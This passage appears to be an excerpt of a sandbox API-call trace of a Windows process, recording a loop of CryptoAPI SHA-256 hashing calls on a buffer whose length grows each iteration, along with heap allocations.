	[0197.040] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c9f8
	[0197.040] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c9f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c9f8, pdwDataLen=0x128aac) returned 1
	[0197.040] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.040] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.040] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.041] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.041] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0197.041] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ca20
	[0197.041] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ca20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ca20, pdwDataLen=0x128aac) returned 1
	[0197.041] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.041] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.041] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.041] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.041] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0197.041] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ca48
	[0197.041] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ca48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ca48, pdwDataLen=0x128aac) returned 1
	[0197.041] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.042] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.042] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.042] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.042] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0197.042] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ca70
	[0197.042] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ca70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ca70, pdwDataLen=0x128aac) returned 1
	[0197.042] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.042] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.042] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.042] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.042] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0197.042] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ca98
	[0197.042] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ca98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ca98, pdwDataLen=0x128aac) returned 1
	[0197.043] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.043] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.043] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.043] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.043] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0197.043] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cac0
	[0197.043] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cac0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cac0, pdwDataLen=0x128aac) returned 1
	[0197.043] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.043] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.043] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.043] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.043] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0197.043] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cae8
	[0197.044] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cae8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cae8, pdwDataLen=0x128aac) returned 1
	[0197.044] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.044] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.044] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.044] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.044] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0197.044] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cb10
	[0197.044] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cb10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cb10, pdwDataLen=0x128aac) returned 1
	[0197.044] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.044] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.044] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.045] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.045] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0197.045] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cb38
	[0197.045] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cb38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cb38, pdwDataLen=0x128aac) returned 1
	[0197.045] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.045] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.045] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.045] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.045] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0197.045] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cb60
	[0197.046] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cb60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cb60, pdwDataLen=0x128aac) returned 1
	[0197.046] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.046] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.046] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.046] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.046] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0197.046] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cb88
	[0197.046] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cb88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cb88, pdwDataLen=0x128aac) returned 1
	[0197.046] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.046] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.046] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.047] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.047] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0197.047] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cbb0
	[0197.047] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cbb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cbb0, pdwDataLen=0x128aac) returned 1
	[0197.047] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.047] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.047] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.048] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.048] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0197.048] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cbd8
	[0197.048] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cbd8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cbd8, pdwDataLen=0x128aac) returned 1
	[0197.048] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.048] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.048] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.048] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.048] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0197.048] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cc00
	[0197.048] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cc00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cc00, pdwDataLen=0x128aac) returned 1
	[0197.048] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.048] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.048] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.049] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.049] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0197.049] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cc28
	[0197.049] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cc28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cc28, pdwDataLen=0x128aac) returned 1
	[0197.049] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.049] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.049] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.049] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.049] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0197.049] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cc50
	[0197.049] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cc50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cc50, pdwDataLen=0x128aac) returned 1
	[0197.049] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.049] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.049] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.050] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.050] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0197.050] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cc78
	[0197.050] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cc78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cc78, pdwDataLen=0x128aac) returned 1
	[0197.050] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.050] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.050] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.051] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.051] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0197.051] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cca0
	[0197.051] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cca0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cca0, pdwDataLen=0x128aac) returned 1
	[0197.051] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.051] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.051] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.051] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.051] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0197.052] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ccc8
	[0197.052] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ccc8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ccc8, pdwDataLen=0x128aac) returned 1
	[0197.052] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.052] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.052] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.052] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.052] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0197.052] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ccf0
	[0197.052] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ccf0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ccf0, pdwDataLen=0x128aac) returned 1
	[0197.052] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.052] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.052] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.053] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.053] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0197.053] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cd18
	[0197.053] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cd18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cd18, pdwDataLen=0x128aac) returned 1
	[0197.053] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.053] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.053] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.054] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.054] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0197.054] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cd40
	[0197.054] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cd40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cd40, pdwDataLen=0x128aac) returned 1
	[0197.054] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.054] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.054] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.054] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.054] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0197.054] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cd68
	[0197.054] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cd68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cd68, pdwDataLen=0x128aac) returned 1
	[0197.054] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.054] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.054] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.055] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.055] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0197.055] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cd90
	[0197.055] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cd90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cd90, pdwDataLen=0x128aac) returned 1
	[0197.055] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.055] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.055] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.055] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.055] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0197.055] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cdb8
	[0197.055] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cdb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cdb8, pdwDataLen=0x128aac) returned 1
	[0197.055] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.055] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.055] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.056] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.056] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0197.056] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cde0
